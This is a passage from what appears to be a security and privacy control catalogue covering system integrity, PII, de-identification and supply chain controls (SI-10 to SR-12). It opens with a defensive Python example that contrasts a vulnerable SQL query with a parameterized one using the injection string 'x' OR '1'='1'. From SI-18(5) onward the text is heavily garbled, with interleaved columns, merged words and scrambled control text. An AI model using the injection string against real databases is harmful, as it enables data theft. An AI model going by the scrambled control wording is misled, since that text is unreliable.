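    """Parameterized interface (SI-10(6)): the driver never lets data become syntax."""
    return [r[0] for r in db.execute("SELECT name FROM users WHERE name = ?", (name,))]


def handle_request(db, username, quantity):
    """SI-10(3): invalid input yields one fixed, documented response, never a partial result."""
    try:
        name = validate_username(username)
        qty = validate_quantity(quantity)
    except InvalidInput as e:
        return {"status": "rejected", "reason": str(e)}
    return {"status": "ok", "user": lookup_safe(db, name), "quantity": qty}


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    print("unsafe:", lookup_unsafe(db, payload))   # every row comes back
    print("safe:  ", lookup_safe(db, payload))     # no row has that literal name
    print(handle_request(db, payload, "5"))         # rejected before any query runs
```

Validation and parameterization are layered on purpose: the allow-list rejects the payload before it reaches the database, and if a future field has to accept quotes the parameterized query still keeps the value out of the SQL grammar.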
SI-11 Error Handling
Control: a. Generate error messages that provide information necessary for corrective actions without revealing information that could be exploited; and
Discussion: Organizations consider the structure and content of error messages. The extent to which systems can handle error conditions is guided and informed by organizational policy and operational requirements.
Related Controls: AU-2, AU-3, SC-31, SI-2, SI-15.

SI-12 Information Management and Retention
Control: Manage and retain information within the system and information output from the system in accordance with applicable laws, executive orders, directives, regulations, policies, standards, guidelines, and operational requirements.
Discussion: Information management and retention requirements cover the full life cycle of information, in some cases extending beyond system disposal.
Related Controls: AC-16, AU-5, AU-11, CA-2, CA-3, CA-5, CA-6, CA-7, CA-9, CM-5, CM-9, CP-2, IR-8, MP-2, MP-3, MP-4, MP-6, PL-2, PL-4, PM-4, PM-8, PM-9, PS-2, PS-6, PT-2, PT-3, RA-2, RA-3, SA-5, SA-8, SR-2.

SI-12(1) Information Management and Retention | Limit Personally Identifiable Information Elements
Control: Limit personally identifiable information being processed in the information life cycle to the following elements of personally identifiable information: [Assignment: organization-defined elements of personally identifiable information].
Discussion: Limiting the use of personally identifiable information throughout the information life cycle when the information is not needed operationally helps to reduce the level of privacy risk created by a system.
Related Controls: PM-25.

SI-12(2) Information Management and Retention | Minimize Personally Identifiable Information in Testing, Training, and Research
Control: Use the following techniques to minimize the use of personally identifiable information for research, testing, or training: [Assignment: organization-defined techniques].
Discussion: Organizations can minimize the risk to an individual's privacy by employing techniques such as de-identification or synthetic data.
Related Controls: PM-22, PM-25, SI-19.

SI-12(3) Information Management and Retention | Information Disposal
Control: Use the following techniques to dispose of, destroy, or erase information following the retention period: [Assignment: organization-defined techniques].
Discussion: Organizations can minimize both security and privacy risks by disposing of information when it is no longer needed. The disposal or destruction of information applies to originals as well as copies and archived records, including system logs that may contain personally identifiable information.
Related Controls: None.

SI-13 Predictable Failure Prevention
Control: a. Determine mean time to failure (MTTF) for the following system components in specific environments of operation: [Assignment: organization-defined system components]; and
Discussion: While MTTF is primarily a reliability issue, predictable failure prevention is intended to address potential failures of system components that provide security capabilities.
Related Controls: CP-2, CP-10, CP-13, MA-2, MA-6, SA-8, SC-6.

SI-13(1) Predictable Failure Prevention | Transferring Component Responsibilities
Control: Take system components out of service by transferring component responsibilities to substitute components no later than [Assignment: organization-defined fraction or percentage] of mean time to failure.
Discussion: Transferring primary system component responsibilities to other substitute components prior to primary component failure is important to reduce the risk of degraded or debilitated mission or business functions. Making such transfers based on a percentage of mean time to failure allows organizations to be proactive based on their risk tolerance. However, the premature replacement of system components can result in the increased cost of system maintenance.
Related Controls: None.

SI-9 Information Input Restrictions
Control: [Withdrawn: Incorporated into AC-2, AC-3, AC-5, and AC-6.]

SI-13(3) Predictable Failure Prevention | Man Transfer Between Components
Control: Manually initiate transfers between active and standby system components when the use of the active component reaches [Assignment: organization-defined percentage] of the mean time to failure.
Discussion: For example, if the MTTF for a system component is 100 days and the MTTF percentage defined by the organization is 90 percent, the manual transfer would occur after 90 days.
Related Controls: None.

SI-13(4) Predictable Failure Prevention | Standby Component Installation and Notification
Control: If system component failures are detected: (a) Ensure that the standby components are successfully and transparently installed within [Assignment: organization-defined time period]; and
Discussion: Automatic or manual transfer of components from standby mode to active mode can occur upon the detection of component failures.
Related Controls: None.

SI-13(5) Predictable Failure Prevention | Failover Capability
Control: Provide [Selection: real-time; near real-time] [Assignment: organization-defined failover capability] for the system.
Discussion: Failover refers to the automatic switchover to an alternate system upon the failure of the primary system.
Related Controls: CP-6, CP-7, CP-9.
SI-14 Non-persistence
Control: Implement non-persistent [Assignment: organization-defined system components and services] that are initiated in a known state and terminated [Selection (one or more): upon end of session of use; periodically at [Assignment: organization-defined frequency]].
Discussion: Implementation of non-persistent components and services mitigates risk from advanced persistent threats (APTs) by reducing the targeting capability of adversaries (i.e., window of opportunity and available attack surface) to initiate and complete attacks. By implementing the concept of non-persistence for selected system components, organizations can provide a trusted, known state computing resource for a specific time period that does not give adversaries sufficient time to exploit vulnerabilities in organizational systems or operating environments.
Related Controls: SC-30, SC-34, SI-21.

SI-14(1) Non-persistence | Refresh from Trusted Sources
Control: Obtain software and data employed during system component and service refreshes from the following trusted sources: [Assignment: organization-defined trusted sources].
Discussion: Trusted sources include software and data from write-once, read-only media or from selected offline secure storage facilities.
Related Controls: None.

SI-14(2) Non-persistence | Non-persistent Information
Control: (a) [Selection: Refresh [Assignment: organization-defined information] [Assignment: organization-defined frequency]; Generate [Assignment: organization-defined information] on demand]; and
Discussion: Retaining information longer than is needed makes the information a potential target for advanced adversaries searching for high value assets to compromise through unauthorized disclosure, unauthorized modification, or exfiltration. For system-related information, unnecessary retention provides advanced adversaries information that can assist in their reconnaissance and lateral movement through the system.
Related Controls: None.

SI-14(3) Non-persistence | Non-persistent Connectivity
Control: Establish connections to the system on demand and terminate connections after [Selection: completion of a request; a period of non-use].
Discussion: Persistent connections to systems can provide advanced adversaries with paths to move laterally through systems and potentially position themselves closer to high value assets.
Related Controls: SC-10.
SI-15 Information Output Filtering
Control: Validate information output from the following software programs and/or applications to ensure that the information is consistent with the expected content: [Assignment: organization-defined software programs and/or applications].
Discussion: Certain types of attacks, including SQL injections, produce output results that are unexpected or inconsistent with the output results that would be expected from software programs or applications.
Related Controls: SI-3, SI-4, SI-11.

SI-16 Memory Protection
Control: Implement the following controls to protect the system memory from unauthorized code execution: [Assignment: organization-defined controls].
Discussion: Some adversaries launch attacks with the intent of executing code in non-executable regions of memory or in memory locations that are prohibited.
Related Controls: AC-25, SC-3, SI-7.

SI-17 Fail-safe Procedures
Control: Implement the indicated fail-safe procedures when the indicated failures occur: [Assignment: organization-defined list of failure conditions and associated fail-safe procedures].
Discussion: Failure conditions include the loss of communications among critical system components or between system components and operational facilities.
Related Controls: CP-12, CP-13, SC-24, SI-13.

SI-18 Personally Identifiable Information Quality Operations
Control: a. Check the accuracy, relevance, timeliness, and completeness of personally identifiable information across the information life cycle [Assignment: organization-defined frequency]; and
Discussion: Personally identifiable information quality operations include the steps that organizations take to confirm the accuracy and relevance of personally identifiable information throughout the information life cycle.
Related Controls: PM-22, PM-24, PT-2, SI-4.

SI-18(1) Personally Identifiable Information Quality Operations | Automation Support
Control: Correct or delete personally identifiable information that is inaccurate or outdated, incorrectly determined regarding impact, or incorrectly de-identified using [Assignment: organization-defined automated mechanisms].
Discussion: The use of automated mechanisms to improve data quality may inadvertently create privacy risks. Automated tools may connect to external or otherwise unrelated systems, and the matching of records between these systems may create linkages with unintended consequences. Organizations assess and document these risks in their privacy impact assessments.
Related Controls: PM-18, RA-8.

SI-18(2) Personally Identifiable Information Quality Operations | Data Tags
Control: Employ data tags to automate the correction or deletion of personally identifiable information across the information life cycle within organizational systems.
Discussion: Data tagging personally identifiable information includes tags that note processing permissions and authority to process.
Related Controls: AC-3, AC-16, SC-16.

SI-18(3) Personally Identifiable Information Quality Operations | Collection
Control: Collect personally identifiable information directly from the individual.
Discussion: Individuals or their designated representatives can be sources of correct personally identifiable information. Organizations consider contextual factors that may incentivize individuals to provide correct data versus false data. Additional steps may be necessary to validate collected information.
Related Controls: None.

SI-18(4) Personally Identifiable Information Quality Operations | Individual Requests
Control: Correct or delete personally identifiable information upon request by individuals or their designated representatives.
Discussion: Inaccurate personally identifiable information maintained by organizations may cause problems for individuals, especially in those business functions where inaccurate information may result in inappropriate decisions or the denial of benefits and services to individuals.
Related Controls: None.
where necessary to validate collected information
SI-18(5) Personally Identifiable Information Quality Operations | Notice of Correction or Deletion Notify [Assignment: organization-defined recipients of personally identifiable information] and When
based on personally
the nature identifiable
andorcontext of the is corrected or inaccurate
deleted, informationtake
organizations may steps
resulttoinensure None.
individuals thatfollowing
the personally identifiable information has been corrected or deleted. inappropriate
that all authorized decisions theofdenial of personally
benefits and identifiable
services toinformation,
individuals. how itcorrect
Eventhe is to be used, and
SI-19 De-identification a. Remove the elements of personally identifiable information from datasets: De-identification
information, is recipients
the circumstances,
general such for
term information,
thecause
process and of the individual
removing the with whom
association betweeninformation
a set ofisideMP-6, PM-22, PM-23, PM-24, RA-2, SI-12.
[Assignment: organization-defined elements of personally identifiable information]; and associated orintheir certaindesignated can
representatives, problems
are informed forofindividuals
the corrected that or outweigh
deletedthe
SI-19(1) De-identification | Collection De-identify the dataset upon collection by not collecting personally identifiable information. If a data source contains personally identifiable information but the information will not be used,
information. None.
SI-19(2) De-identification | Archiving Prohibit archiving of personally identifiable information elements if those elements in a dataset will Datasets the dataset cancan be be de-identified
archived for many when it is created
reasons. by not collecting
The envisioned purposesthe fordata elementsdataset
the archived that contain
are None.
not be needed afteridentifiable
the datasetinformation
is archived. elements from a dataset prior to its release if those the personally
specified, and ifidentifiable
personally information.
identifiable For example,
information if an organization
elements are not uses does notthe
required, intend
elements to useare thenot
SI-19(3) De-identification | Release Remove personally Prior
social to releasing
security numbera dataset,
of an aapplicant,
data custodian then considers
application the
forms intended
do not ask of the
for a dataset
social and
security None.
elements in theencrypt,
dataset do notorneed to bedirect
part identifiers
of the datainrelease. archived. Forif example,
determines it ispossible
necessarysocialtosecurity
release numbers may have beeninformation.
collected forIf record linkage, but the
SI-19(4) De-identification | Removal, Masking, Encryption, Hashing, or Replacement of Direct Identifiers Remove, mask, hash, replace a dataset. There
archived aredataset
many may include processes for personally
removing identifiable
direct identifiers from the personally
a dataset. Columns
case, itinis anot dataseSC-12, SC-13.
identifiable information is not the required
necessary, theelements
information from the be
can linked
removedrecords. usingIn this
de-identification
SI-19(5) De-identification | Statistical Disclosure Control Manipulate numerical data, contingency tables, and statistical findings so that no individual or Many types of statistical analyses can result in the disclosure of information about individuals even None.
techniques.
SI-19(6) De-identification | Differential Privacy organization is identifiable
Prevent disclosure in theidentifiable
of personally results of the analysis. by adding non-deterministic noise to the re if
information Theonly summary information
mathematical definition for is provided.
differential Forprivacy
example, holdsif athat
school thethat
result publishes
of a dataset a monthly
analysis table
should SC-12, SC-13.
with the number of minority students enrolled, reports that it has 10-19 such students in January,
SI-19(7) De-identification | Validated Algorithms and Software Perform de-identification using validated algorithms and software that is validated to implement Algorithms
and subsequently that appear reports to that
remove it has personally
20-29 such identifiable
students information
in March, then from a dataset
it can may in
be inferred factthe None.
that
SI-19(8) De-identification | Motivated Intruder the algorithms.
Perform a motivated intruder test on the de-identified dataset to determine if the identified data leave information that is personally identifiable or data that is
A motivated intruder test is a test in which an individual or group takes a data release and specified re-identifiable. Software that is None.
remains or ifor
thecapabilities
de-identified data can be re-identified. claimed toand implement a to
validated algorithm ormaymorecontain bugs in ortheimplement a different algorithm.
SI-20 Tainting Embed data in the following systems or system components to determine if organizat resources Many cyber-attacks
Software maythe
attempts
de-identifytarget re-identify
organizational
one typeknowledge,
oneinformation,
of data, such
individuals
or information
as integers, but
de-identified dataset.
that the organization
not de-identify
Such
holds
of on be AU-13.
tests specify amount of inside computational resources, financialanother
resources, type data,
SI-21 Information Refresh Refresh [Assignment: organization-defined information] at [Assignment: organization-defined frequ and Retaining information
skills that intrudersfor longerto
possess than it is needed
conduct the tests. makes it an increasingly
A motivated intrudervaluable
test can and enticingif tar
determine the SI-14.
SI-22 Information Diversity a. Identify the following alternative sources of information for [Assignment: organization-defined Actions taken by a system service or a function are often driven by the information it receives. None.
SI-23 Information Fragmentation essential
Based on functions
[Assignment: and organization-defined
services]: [Assignment: organization-defined alternative information
circumstances]: Corruption,
One objective fabrication,
of the advanced modification,
persistent or deletion
threat isoftothat information
exfiltrate valuable could impact theOnce
information. ability of the None.
sources];
a. Develop,
Fragment andthe following information: [Assignment: organization-defined information]; and service function tois properly
generallycarry outfor its intended actions.toByrecover having the multiple sources of input, the
SR-1 Policy and Procedures a. document, and disseminate to [Assignment: organization-defined personnel or roles]: exfiltrated, Supply chain
service or
there
risk management
function can continue
nopolicy
way
operationandthe if
organization
procedures
one source address
is the controls
corrupted or
lostininformation.
no the SR
longer familyTherefore,
available. asItwell
is as sPM-9, PM-30, PS-8, SI-12.
SR-2 Supply Chain Risk Management Plan 1. [Selectiona (one
a. Develop plan foror more):
managing Organization-level;
supply chain risks Mission/business
associated withprocess-level;
the research andSystem-level] supply organizations
development, The dependence
may consider dividing the information into disparate elements and distributing those
on products, systems, and services from and external providers,
chain management policy that: delivery, integration, operations and maintenance, and disposal elements across multiple systems or system components locations. Such as well as
actions willthe nature CA-2, CP-4, IR-4, MA-2, MA-6, PE-16, PL-2, PM-9, PM-30, RA-3, RA-7, SA-8, SI-4.
increase
SR-2(1) Supply Chain Risk Management Plan | Establish SCRM Team design,risk
Establish manufacturing,
a supply chainacquisition,
risk management team consisting of [Assignment: organization-defined of the
To relationships
implement supplywith chain those
riskproviders,
management present
plans, anorganizations
increasing level of risk atocoordinated,
establish an organization. team- None.
of the following
personnel, roles, systems,
and system components
responsibilities] to lead or system
and support services:
the [Assignment:
following SCRM organization-
activities: Threatapproach
based actions that may increase
to identify security
andorganizations,
assess or privacy
supply risksand
chain risks includemanage unauthorized
these production, the
SR-3 Supply Chain Controls and Processes a. Establish
defined a process
systems, or processes
system components, to identify
or systemandservices];
address weaknesses or deficiencies in the supply insertion Supply chain elements
or use include
of counterfeits, tampering, entities,
theft, or tools
insertion employed
of malicious forrisks
software
by using and
the research
and hardware, devel CA-2, MA-2, MA-6, PE-3, PE-16, PL-8, PM-30, SA-2, SA-3, SA-4, SA-5, SA-8, SA-9, SA-10,
[Assignment:
chain elements organization-defined supply chain risk management activities]. programmatic and technical mitigation techniques. The team approach enables organizations to and SA-15, SC-7, SC-29, SC-30, SC-38, SI-7, SR-6, SR-9, SR-11.
SR-3(1) Supply Chain Controls and Processes | Diverse Supply Base Employ a diverseand setprocesses
of sourcesoffor [Assignment:
the following organization-defined
system componentssystem or system
and services: component] Diversifying the supply of systems, system components, and services can reduce the probability
[Assignment: conduct an analysis of their supply chain, communicate with internal and external partners or None.
in coordination with [Assignment:
organization-defined organization-defined supply chain personnel];
SR-3(2) Supply Chain Controls and Processes | Limitation of Harm Employ the following system
controlscomponents
to limit harm and services].
from potential adversaries identifying and targeting the Controls that adversaries
that canwill be successfully
implemented identify
to reduce andthe target the supply
probability chain and can
of adversaries reduce theidentifying
successfully impact of None.
organizational supply chain: [Assignment: organization-defined controls]. a supply
and chainthe
targeting event or compromise.
supply chain include Identifying
avoiding multiple
the purchase suppliers
of customfor replacement
or components
non-standardized
SR-3(3) Supply Chain Controls and Processes | Sub-tier Flow Down Ensure that the controls included in the contracts of prime contractors are also included in the contr can To manage
reduce the supply chain risk
probability effectively
that the replacementand holistically,
component it is important
will become thatunavailable.
organizations ensure th SR-5, SR-8.
configurations, employing approved vendor lists with standing reputations in industry,Employing
following a
SR-4 Provenance Document, monitor, and maintain valid provenance of the following systems, system components, anpre-agreed Every system and system schedules
maintenance component and hasupdate
a pointand of origin
patch and deliverymaymechanisms,
be changed throughoutmaintainingitsa existenc CM-8, MA-2, MA-6, RA-9, SA-3, SA-8, SI-4.
SR-4(1) Provenance | Identity Establish and maintain unique identification of the following supply chain elements, processes, and Knowing who and what is in the supply chains of organizations is critical to gaining visibility into IA-2, IA-8, PE-16.
SR-4(2) Provenance | Track and Trace Establish and maintain unique identification of the following systems and critical system componentsTracking the unique identification of systems and system components during development and transpor IA-2, IA-8, PE-16, PL-2.
SR-4(3) Provenance | Validate as Genuine and Not Altered Employ the following controls to validate that the system or system component received is genuine aFor many systems and system components, especially hardware, there are technical means to determine AT-3,i SR-9, SR-10, SR-11.
SR-4(4) Provenance | Supply Chain Integrity — Pedigree Employ [Assignment: organization-defined controls] and conduct [Assignment: organization-defined ana Authoritative information regarding the internal composition of system components and the provenance RA-3.
SR-5 Acquisition Strategies, Tools, and Methods Employ the following acquisition strategies, contract tools, and procurement methods to protect again The use of the acquisition process provides an important vehicle to protect the supply chain. There AT-3, SA-2, SA-3, SA-4, SA-5, SA-8, SA-9, SA-10, SA-15, SR-6, SR-9, SR-10, SR-11.
SR-5(1) Acquisition Strategies, Tools, and Methods | Adequate Supply Employ the following controls to ensure an adequate supply of [Assignment: organization-defined criAdversaries can attempt to impede organizational operations by disrupting the supply of critical sys RA-9.
SR-5(2) Acquisition Strategies, Tools, and Methods | Assessments Prior to Selection, Acceptance, ModificatioAssess the system, system component, or system service prior to selection, acceptance, modification,Organizational personnel or independent, external entities conduct assessments of systems, component CA-8, RA-5, SA-11, SI-7.
SR-6 Supplier Assessments and Reviews Assess and review the supply chain-related risks associated with suppliers or contractors and the s An assessment and review of supplier risk includes security and supply chain risk management processe SR-3, SR-5.
SR-6(1) Supplier Assessments and Reviews | Testing and Analysis Employ [Selection (one or more): organizational analysis; independent third-party analysis; organiza Relationships between entities and procedures within the supply chain, including development and deCA-8, SI-4.
SR-7 Supply Chain Operations Security Employ the following Operations Security (OPSEC) controls to protect supply chain-related informati Supply chain OPSEC expands the scope of OPSEC to include suppliers and potential suppliers. OPSEC isSC-38.
SR-8 Notification Agreements Establish agreements and procedures with entities involved in the supply chain for the system, syste The establishment of agreements and procedures facilitates communications among supply chain entitie IR-4, IR-6, IR-8.
SR-9 Tamper Resistance and Detection Implement a tamper protection program for the system, system component, or system service. Anti-tamper technologies, tools, and techniques provide a level of protection for systems, system co PE-3, PM-30, SA-15, SI-4, SI-7, SR-3, SR-4, SR-5, SR-10, SR-11.
SR-9(1) Tamper Resistance and Detection | Multiple Stages of System Development Life Cycle Employ anti-tamper technologies, tools, and techniques throughout the system development life cyclThe system development life cycle includes research and development, design, manufacturing, acquisiSA-3.
SR-10 Inspection of Systems or Components Inspect the following systems or system components [Selection (one or more): at random; at [Assign The inspection of systems or systems components for tamper resistance and detection addresses physic AT-3, PM-30, SI-4, SI-7, SR-3, SR-4, SR-5, SR-9, SR-11.
SR-11 Component Authenticity a. Develop and implement anti-counterfeit policy and procedures that include the means to detect Sources of counterfeit components include manufacturers, developers, vendors, and contractors. Anti- PE-3, SA-4, SI-7, SR-9, SR-10.
SR-11(1) Component Authenticity | Anti-counterfeit Training and
Trainprevent counterfeit
[Assignment: components from
organization-defined enteringor
personnel the system;
roles] and counterfeit system componentNone.
to detect AT-3.
SR-11(2) Component Authenticity | Configuration Control for Component Service and Repair Maintain configuration control over the following system components awaiting service or repair and None. CM-3, MA-2, MA-4, SA-10.
SR-11(3) Component Authenticity | Anti-counterfeit Scanning Scan for counterfeit system components [Assignment: organization-defined frequency]. The type of component determines the type of scanning to be conducted (e.g., web application scanniRA-5.
SR-12 Component Disposal Dispose of [Assignment: organization-defined data, documentation, tools, or system components] usData, documentation, tools, or system components can be disposed of at any time during the systemMP-6. d

14 of 2021-01-21